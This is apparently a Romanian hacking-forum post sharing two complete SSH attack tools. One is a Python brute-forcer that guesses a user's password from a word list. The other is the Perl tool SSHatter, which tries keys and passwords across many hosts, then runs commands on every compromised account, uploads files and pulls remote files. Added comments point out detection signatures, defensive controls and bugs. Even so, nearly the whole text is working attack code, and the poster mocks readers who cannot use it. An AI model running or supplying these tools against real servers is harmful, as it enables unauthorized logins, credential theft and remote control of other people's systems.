Nytro

Brute SSH


E luat de pe Backtrack.

#!/usr/bin/python
import thread
import time
from threading import Thread
import sys, os,threading, time, traceback, getopt
import paramiko
import terminal

# Module-level state shared by every worker thread.
global adx
global port

# adx is the stop flag: "1" while the search is running, set to "0" by force.run on the first successful login.
adx="1"
# port is assigned here but never read in the code shown; the Transport is built from hostname alone.
port=22
data=[]
# i becomes a one-element list whose single slot counts the worker threads currently in flight.
i=[]

term = terminal.TerminalController()
# paramiko's transport log goes to demo.log in the working directory, so a host that ran this script
# keeps a local record of its connection attempts (useful when examining a suspect machine).
paramiko.util.log_to_file('demo.log')

# Start-up banner.
print "\n*************************************"
print "*"+term.RED + "SSH Bruteforcer Ver. 0.2"+term.NORMAL+" *"
print "*Coded by Christian Martorella *"
print "*Edge-Security Research *"
print "*laramies@gmail.com *"
print "*************************************\n"

# Print the command-line help and exit; called when too few arguments are given or option parsing fails.
def usage():
print "Usage: brutessh.py options \n"
print " -h: destination host\n"
print " -u: username to force\n"
print " -d: password file \n"
print " -t: threads (default 12, more could be bad)\n\n"
print "Example: brutessh.py -h 192.168.1.55 -u root -d mypasswordlist.txt \n"
sys.exit()

# Worker thread that tries exactly one candidate password against the target host.
# NOTE(review): the listing lost its indentation when it was posted, so the nesting below is inferred, not shown.
class force(Thread):
def __init__( self, name ):
Thread.__init__(self)
# The thread name doubles as the payload: it carries one raw line from the password file.
self.name = name

def run(self):
global adx
# Workers started after a success see adx == "0" and skip the attempt.
if adx == "1":
passw=self.name.split("\n")[0]
# A fresh Transport (and so a fresh TCP connection) is opened per candidate. The server therefore sees
# many short sessions with a single failed password each: a per-connection cap such as sshd's MaxAuthTries
# does not slow this pattern, whereas per-source rate limiting, ban-on-failure tooling, MaxStartups
# and key-only authentication do.
t = paramiko.Transport(hostname)
try:
t.start_client()
except Exception:
# Connection and negotiation errors are swallowed; x is a throwaway assignment.
x = 0

try:
t.auth_password(username=username,password=passw)
except Exception:
# A rejected password raises here and is ignored; the outcome is read from is_authenticated() below.
x = 0

if t.is_authenticated():
# The recovered password is printed to the terminal in clear text.
print term.DOWN + term.GREEN + "\nAuth OK ---> Password Found: " + passw + term.DOWN + term.NORMAL
t.close()
adx = "0"
else:
print term.BOL + term.UP + term.CLEAR_EOL + passw + term.NORMAL
t.close()
time.sleep(0)
# Shared in-flight counter, decremented without a lock.
i[0]=i[0]-1


# Dispatcher: start one force thread per password line while keeping a running count in i[0].
# NOTE(review): indentation was lost in the post, so whether the final join sits inside the loop cannot be told from here.
def test_thread(names):
i.append(0)
j=0
# The loop has no sleep or wait; when the counter is at the limit it spins until a worker decrements i[0].
while len(names):
try:
# th is the global set in test(); i[0] is read and written here and in force.run without a lock.
if i[0]<th:
n = names.pop(0)
i[0]=i[0]+1
# This local name shadows the imported thread module inside the function.
thread=force(n)
thread.start()
j=j+1
except KeyboardInterrupt:
print "Attack suspended by user..\n"
sys.exit()
# Only the most recently started worker is joined; earlier workers are not waited for explicitly.
thread.join()

# Entry routine: parse -h/-u/-d/-t, load the password file and hand the lines to test_thread.
def test(argv):
global th
global hostname
global username
th = 12
if len(sys.argv) < 3:
usage()
try :
opts, args = getopt.getopt(argv,"h:u:d:t:")
except getopt.GetoptError:
usage()
for opt,arg in opts :
if opt == '-u':
username = arg
elif opt == '-h':
hostname =arg
elif opt == '-d':
password = arg
elif opt == "-t":
# arg is the raw option string and is not converted to a number before test_thread compares it
# with the integer counter. NOTE(review): the burst of parallel connections a target sees may
# therefore not match the value passed to -t; confirm against the interpreter's comparison rules.
th = arg
try:
f = open(password, "r")
except:
# Bare except: a missing -d option (unbound name) lands here as well as a real open failure.
print "Can't open password file\n"
sys.exit()
print term.RED + "HOST: " +term.NORMAL + hostname + term.RED + " Username: " +term.NORMAL + username +term.RED + " Password file: " +term.NORMAL+ password
print "==========================================================================="
print "Trying password...\n"
# The whole word list is read into memory; the file handle is never closed in the code shown.
name = f.readlines()
# NOTE(review): under Python 2 on Unix time.clock() reports processor time, not wall-clock time.
starttime = time.clock()
test_thread(name)
stoptime = time.clock()
print "\nTimes -- > Init: "+ str(starttime) + " End: "+str(stoptime)
print "\n"

# Script entry point: run test() on the command-line arguments and exit quietly on Ctrl-C.
if __name__ == "__main__":
try:
test(sys.argv[1:])
except KeyboardInterrupt:
print "Attack suspended by user...\n"
sys.exit()

Va descurcati. Daca nu sunteti in stare sa il folositi nici pe asta, lasati-va de astfel de prostii. (@ "hackerii de carton")


#!/usr/bin/perl -w
# $Header: /var/lib/cvsd/var/lib/cvsd/SSHatter/src/SSHatter.pl,v 1.12 2009-12-10 01:25:47 timb Exp $
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the Nth Dimension nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (c) Tim Brown, 2009
# <mailto:timb@nth-dimension.org.uk>
# <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>

use strict;

package SSHatter::SSH::Host;

use Net::SSH::Perl;

# Constructor: build a host record holding the target's name and port.
# Arguments after the class name are the hostname and the port number.
sub new {
    my ($class, $hostname, $portnumber) = @_;
    my $self = bless({}, $class);
    $self->{'hostname'} = $hostname;
    $self->{'portnumber'} = $portnumber;
    return $self;
}

# Return the "hostname:port" label used in log lines and in the names of downloaded files.
sub info {
    my ($self) = @_;
    return join(":", $self->{'hostname'}, $self->{'portnumber'});
}

# Create the pipe used to pass results for this host from the forked worker back to the parent;
# both ends are stored on the object as 'readhandle' and 'writehandle'.
sub pipe {
my $self;
$self = shift;
pipe($self->{'readhandle'}, $self->{'writehandle'});
}

# Test whether $username can log in to this host with the private key file $key.
# Returns 1 on success and 0 when the error text contains "Permission denied";
# dies with a fixed exception string on any other failure.
sub checkbykey {
my $self;
my $username;
my $key;
my $sshhandle;
$self = shift;
$username = shift;
$key = shift;
eval {
# Password authentication is switched off for this connection, so only the supplied key is offered.
$sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$key], options => ["PasswordAuthentication no"]);
};
if ($@ ne "") {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
} else {
eval {
$sshhandle->login($username);
# Every successful login runs this fixed command; on a server with command or session auditing
# the literal string "echo SSHatter" is a stable indicator that this tool was used.
$sshhandle->cmd("echo SSHatter");
};
if ($@ ne "") {
if ($@ !~ /Permission denied/) {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
} else {
return 0;
}
}
}
return 1;
}

# Test whether $username / $password is accepted by this host.
# Returns 1 on success and 0 when the error text contains "Permission denied";
# dies with a fixed exception string on any other failure.
sub checkbypassword {
my $self;
my $username;
my $password;
my $sshhandle;
$self = shift;
$username = shift;
$password = shift;
eval {
# A new connection object is built for every attempt, so each guess appears to the server
# as its own session; per-source rate limiting and ban-on-failure tooling are the relevant controls.
$sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'});
};
if ($@ ne "") {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
} else {
eval {
$sshhandle->login($username, $password);
# Fixed probe command run after a successful login; "echo SSHatter" in command or session
# audit logs is a stable indicator of this tool.
$sshhandle->cmd("echo SSHatter");
};
if ($@ ne "") {
if ($@ !~ /Permission denied/) {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
} else {
return 0;
}
}
}
return 1;
}

# Accessor: the write end of this host's result pipe.
sub writehandle {
my $self;
$self = shift;
return $self->{'writehandle'};
}

# Accessor: the read end of this host's result pipe.
sub readhandle {
my $self;
$self = shift;
return $self->{'readhandle'};
}

# Close the write end of the result pipe so that a reader on the other end reaches end-of-file.
sub unpipe {
my $self;
$self = shift;
close($self->{'writehandle'});
}

# Record that $username was accepted with key file $key. One entry per username:
# a later key for the same user overwrites the earlier one.
sub addkey {
my $self;
my $username;
my $key;
$self = shift;
$username = shift;
$key = shift;
$self->{'keys'}{$username} = $key;
}

# Record that $username was accepted with $password. One entry per username, held in memory
# in clear text; a later password for the same user overwrites the earlier one.
sub addpassword {
my $self;
my $username;
my $password;
$self = shift;
$username = shift;
$password = shift;
$self->{'passwords'}{$username} = $password;
}

# Return the usernames for which a working key file has been recorded.
sub usernamesbykey {
my $self;
$self = shift;
return keys(%{$self->{'keys'}});
}

# Return the usernames for which a working password has been recorded.
sub usernamesbypassword {
my $self;
$self = shift;
return keys(%{$self->{'passwords'}});
}

# Return the key file path recorded for $username (undef when none was recorded).
sub key {
my $self;
my $username;
$self = shift;
$username = shift;
return $self->{'keys'}{$username};
}

# Return the clear-text password recorded for $username (undef when none was recorded).
sub password {
my $self;
my $username;
$self = shift;
$username = shift;
return $self->{'passwords'}{$username};
}

# Run $commandstring on this host as $username, authenticating with the key recorded for that user.
# Returns whatever cmd() returns; callers in this file read element 0 as output and element 2 as a status.
# On "Permission denied" it returns the sentinel list ("", "", -42); other failures die.
sub executebykey {
my $self;
my $username;
my $commandstring;
my $sshhandle;
my @resultstrings;
$self = shift;
$username = shift;
$commandstring = shift;
eval {
$sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$self->{'keys'}{$username}], options => ["PasswordAuthentication no"]);
};
if ($@ ne "") {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
} else {
eval {
# Local echo of user, key file path, host and command to STDOUT before the command is sent.
print "[" . $username . ":" . $self->{'keys'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n";
$sshhandle->login($username);
# A new login is made for every command, so server-side logs show one session per command.
@resultstrings = $sshhandle->cmd($commandstring);
};
if ($@ ne "") {
if ($@ !~ /Permission denied/) {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
} else {
return ("", "", -42);
}
}
}
return @resultstrings;
}

# Run $commandstring on this host as $username, authenticating with the password recorded for that user.
# Returns whatever cmd() returns; callers in this file read element 0 as output and element 2 as a status.
# On "Permission denied" it returns the sentinel list ("", "", -42); other failures die.
sub executebypassword {
my $self;
my $username;
my $sudoflag;
my $commandstring;
my $sshhandle;
my @resultstrings;
$self = shift;
$username = shift;
$sudoflag = shift;
$commandstring = shift;
eval {
$sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'});
};
if ($@ ne "") {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
} else {
eval {
$sshhandle->login($username, $self->{'passwords'}{$username});
# The account password is echoed to STDOUT in clear text together with host and command,
# so terminal scrollback or redirected output from a run contains recovered credentials.
print "[" . $username . ":" . $self->{'passwords'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n";
# defined() is true for any defined value, including 0, so a caller passing 0 also takes this branch.
if (defined($sudoflag)) {
# The password plus a newline is supplied as the remote command's standard input.
@resultstrings = $sshhandle->cmd($commandstring, $self->{'passwords'}{$username} . "\n");
} else {
@resultstrings = $sshhandle->cmd($commandstring);
}
};
if ($@ ne "") {
if ($@ !~ /Permission denied/) {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
} else {
return ("", "", -42);
}
}
}
return @resultstrings;
}

package SSHatter;

use File::Basename;
use Getopt::Std;
use Parallel::ForkManager;

# File-scoped variables for the main script: parsed options, file handles, the fork manager,
# the list of target host objects and scratch variables reused across the stages below.
my %argumentslist;
my $maximumprocess;
my $targetserverfilename;
my $usernamefilename;
my $keydirectoryname;
my $passwordfilename;
my $dumbflag;
my $sudoflag;
my $safeflag;
my $masscommand;
my $interactiveflag;
my $localfilename;
my $remotefilename;
my $targetserverhandle;
my $targetserverstring;
my $hostname;
my $portnumber;
my $forkmanager;
my $targetserver;
my $processid;
my $writehandle;
my $usernamehandle;
my $usernamestring;
my $keyfilename;
my $passwordhandle;
my $passwordstring;
my @targetservers;
my $username;
my $confirmresponse;
my @resultstrings;
my $nextcommand;
my $localfilehandle;
my $localfilebyte;
my $localfiledata;

# Split one "host[:port]" line from the target list into (host, port).
# Line feeds are stripped first. The port is the first run of digits after the colon;
# a missing, zero or out-of-range (above 65535) port falls back to 22.
sub parsetarget {
    my ($line) = @_;
    $line =~ s/\x0a//g;
    my ($host, $port) = split(/:/, $line);
    if ($port && $port =~ /([0-9]+)/) {
        $port = $1;
        $port = 22 if $port <= 0 || $port > 65535;
    }
    else {
        $port = 22;
    }
    return ($host, $port);
}

# Usage text. The message is raised with die, so showing help also ends the program.
# The option list doubles as a summary of the tool's modes: credential guessing (-k, -p, -d)
# followed by optional command execution (-m, -i) or file transfer (-P, -G) on every host where a login worked.
sub main::HELP_MESSAGE {
die "usage: " . basename($0) . " -x <maximumprocess> -t <targetserverfilename> -u <usernamefilename> <[-k <keydirectoryname>] [-p <passwordfilename>] [-d]> [[-0] [-s] -m <masscommand> | [-0] [-s] -i | -P <localfilename> | -G <remotefilename>]

-d - dumb mode, try username equals password, username, blank
-0 - sudo mode, echo the password to STDIN (useful for systems where sudo -S works)
-s - safe mode, prompt before executing
-m - mass mode, run one command across all targets
-i - interactive mode, run multiple commands across all targets (non-persistant)
-P - upload a file
-G - download a file

If sudo mode is not enabled, then " . $0 . " will block on STDIN.";
}

# Print the script name and version string.
sub main::VERSION_MESSAGE {
print basename($0) . " 1.0\n";
}

# Option parsing. -x, -t and -u are mandatory; at least one of -k, -p or -d must be given.
# Each failed check calls help_mess, which is expected to end in main::HELP_MESSAGE above (that sub dies).
$Getopt::Std::STANDARD_HELP_VERSION = 1;
getopts("x:t:u:k:p:d0sm:iP:G:", \%argumentslist);
# The pattern is unanchored: the first run of digits anywhere in the -x value is taken as the process limit.
if (defined($argumentslist{'x'}) && ($argumentslist{'x'} =~ /([0-9]+)/)) {
$maximumprocess = $1;
} else {
Getopt::Std::help_mess("", "main");
}
# -e only checks that the path exists, not that it is a readable regular file.
if (defined($argumentslist{'t'}) && (-e $argumentslist{'t'})) {
$targetserverfilename = $argumentslist{'t'};
} else {
Getopt::Std::help_mess("", "main");
}
if (defined($argumentslist{'u'}) && (-e $argumentslist{'u'})) {
$usernamefilename = $argumentslist{'u'};
} else {
Getopt::Std::help_mess("", "main");
}
if (defined($argumentslist{'k'}) && (-e $argumentslist{'k'})) {
$keydirectoryname = $argumentslist{'k'};
}
if (defined($argumentslist{'p'}) && (-e $argumentslist{'p'})) {
$passwordfilename = $argumentslist{'p'};
}
if (defined($argumentslist{'d'})) {
$dumbflag = 1;
}
if (!defined($keydirectoryname) && !defined($passwordfilename) && !defined($dumbflag)) {
Getopt::Std::help_mess("", "main");
}
if (defined($argumentslist{'0'})) {
$sudoflag = 1;
}
if (defined($argumentslist{'s'})) {
$safeflag = 1;
}
# The action modes are mutually exclusive by nesting order: -m wins over -i, then -P, then -G.
if (defined($argumentslist{'m'})) {
$masscommand = $argumentslist{'m'};
} else {
if (defined($argumentslist{'i'})) {
$interactiveflag = 1;
} else {
if (defined($argumentslist{'P'})) {
if (-e $argumentslist{'P'}) {
$localfilename = $argumentslist{'P'};
} else {
Getopt::Std::help_mess("", "main");
}
} else {
if (defined($argumentslist{'G'})) {
$remotefilename = $argumentslist{'G'};
}
}
}
}

# Create the fork manager and register the callback that runs in the parent when a per-host
# worker finishes. The callback drains that host's pipe and stores each reported credential on the host object.
$forkmanager = Parallel::ForkManager->new($maximumprocess);
$forkmanager->run_on_finish(sub {
my $processid;
my $returncode;
my $targetserver;
my $readhandle;
my $readdata;
my $credentialtype;
my $username;
my $credentialstring;
$processid = shift;
$returncode = shift;
$targetserver = shift;
# Close the parent's copy of the write end so the read loop below can reach end-of-file.
$targetserver->unpipe();
$readhandle = $targetserver->readhandle();
while ($readdata = <$readhandle>) {
$readdata =~ s/\x0a//g;
# Record format is "<type> <username> <credential>" split on single spaces into three fields;
# anything after a space inside the credential is dropped by this assignment.
($credentialtype, $username, $credentialstring) = split(/ /, $readdata);
# "K" marks a key file; every other type is stored as a password.
if ($credentialtype eq "K") {
$targetserver->addkey($username, $credentialstring);
} else {
$targetserver->addpassword($username, $credentialstring);
}
}
close($readhandle);
print STDERR "I: " . $targetserver->info() . " finished\n";
});
# Credential-guessing stage: one forked worker per line of the target file.
# None of the open() calls below check their return value.
open($targetserverhandle, "<" . $targetserverfilename);
while ($targetserverstring = <$targetserverhandle>) {
($hostname, $portnumber) = parsetarget($targetserverstring);
$targetserver = SSHatter::SSH::Host->new($hostname, $portnumber);
print STDERR "I: " . $targetserver->info() . "\n";
push(@targetservers, $targetserver);
$targetserver->pipe();
# start() returns true in the parent, which moves on to the next target; the child continues below.
$processid = $forkmanager->start($targetserver) and next;
$writehandle = $targetserver->writehandle();
open($usernamehandle, "<" . $usernamefilename);
# Order of attempts per username: every file in the key directory, then every line of the password
# file, then the three "dumb mode" guesses. From the server's side this is a run of sequential
# authentication failures for many usernames from one source address, public-key attempts first,
# which is the pattern that failed-login alerting and ban-on-failure tooling key on.
while ($usernamestring = <$usernamehandle>) {
$usernamestring =~ s/\x0a//g;
if (defined($keydirectoryname)) {
while ($keyfilename = <$keydirectoryname/*>) {
if ($targetserver->checkbykey($usernamestring, $keyfilename) == 1) {
print $writehandle "K" . " " . $usernamestring . " " . $keyfilename . "\n";
}
}
}
if (defined($passwordfilename)) {
open($passwordhandle, "<" . $passwordfilename);
while ($passwordstring = <$passwordhandle>) {
$passwordstring =~ s/\x0a//g;
if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) {
# Working passwords travel through the pipe to the parent in clear text.
print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n";
}
}
close($passwordhandle);
}
if (defined($dumbflag)) {
# Dumb mode tries an empty password, the literal "password" and the username itself:
# accounts with blank, default or name-equals-password credentials are what this finds.
foreach $passwordstring (("", "password", $usernamestring)) {
if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) {
print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n";
}
}
}
}
close($usernamehandle);
$forkmanager->finish();
}
close($targetserverhandle);
$forkmanager->wait_all_children();
# Report stage: print every recorded credential to STDOUT as "user:credential@host:port".
# Passwords appear in clear text, so saved output of a run is itself sensitive material.
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
print $username . ":" . $targetserver->key($username) . "@" . $targetserver->info() . "\n";
}
foreach $username ($targetserver->usernamesbypassword()) {
print $username . ":" . $targetserver->password($username) . "@" . $targetserver->info() . "\n";
}
}
# Action stage: after guessing, act on every host and account for which a credential was recorded.
# Safe mode (-s) asks for confirmation first, and only for mass and interactive modes.
if ((defined($masscommand) || defined($interactiveflag)) && defined($safeflag)) {
print "W: executing " . (defined($masscommand) ? $masscommand : "in interactive mode") . ", continue? [y/N] ";
$confirmresponse = <>;
if ($confirmresponse !~ /^[Yy]/) {
exit(1);
}
}
# Every branch below uses the same pattern: call executebykey / executebypassword, skip the result
# when element 2 is the -42 "permission denied" sentinel, otherwise use element 0 (the output).
if (defined($masscommand)) {
# Mass mode: the same command on every host, once per working account.
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, $masscommand);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, $sudoflag, $masscommand);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
}
} else {
if (defined($interactiveflag)) {
# Interactive mode: read commands from input until "exit"; "put" and "get" are handled specially.
print "\$ ";
while ($nextcommand = <>) {
$nextcommand =~ s/\x0a//g;
if ($nextcommand eq "exit") {
last;
} else {
if ($nextcommand =~ /put (.*)/) {
# Upload: the local file is read one byte at a time and turned into \xNN escapes.
open($localfilehandle, "<" . $1);
binmode($localfilehandle);
while (read($localfilehandle, $localfilebyte, 1) != 0) {
$localfiledata .= sprintf("\\x%02x", ord($localfilebyte));
}
close($localfilehandle);
# The file travels inside the remote command line itself: printf "<escapes>" >> <basename>.
# Process or command auditing on the server therefore sees a very long printf argument made of
# \x escapes with output appended to a file in the login directory, which is a usable detection signature.
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($1));
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
foreach $username ($targetserver->usernamesbypassword()) {
# 0 is a defined value, so executebypassword's defined() test handles this call like sudo mode.
@resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($1));
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
}
} else {
if ($nextcommand =~ /get (.*)/) {
# Download: runs "cat <path>" remotely and writes the output to a local file named
# "<user>@<host>:<port>-<basename>". The remote path is placed in the command unquoted
# and the local open() is not checked.
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, "cat " . $1);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1));
print $localfilehandle $resultstrings[0];
close($localfilehandle);
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, 0, "cat " . $1);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1));
print $localfilehandle $resultstrings[0];
close($localfilehandle);
}
}
}
} else {
# Any other input line is run as a command on every host and account.
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, $nextcommand);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, $sudoflag, $nextcommand);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
}
}
}
}
print "\$ ";
}
} else {
if (defined($localfilename)) {
# -P: same printf-based upload as the interactive "put", for the file named on the command line.
open($localfilehandle, "<" . $localfilename);
binmode($localfilehandle);
while (read($localfilehandle, $localfilebyte, 1) != 0) {
$localfiledata .= sprintf("\\x%02x", ord($localfilebyte));
}
close($localfilehandle);
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($localfilename));
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($localfilename));
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
}
} else {
if (defined($remotefilename)) {
# -G: same cat-based download as the interactive "get", for the path named on the command line.
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, "cat " . $remotefilename);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename));
print $localfilehandle $resultstrings[0];
close($localfilehandle);
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, 0, "cat " . $remotefilename);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename));
print $localfilehandle $resultstrings[0];
close($localfilehandle);
}
}
}
}
}
}
}
# The script ends with status 1 on every path that reaches this line, including a run without errors.
exit(1);

sshatter

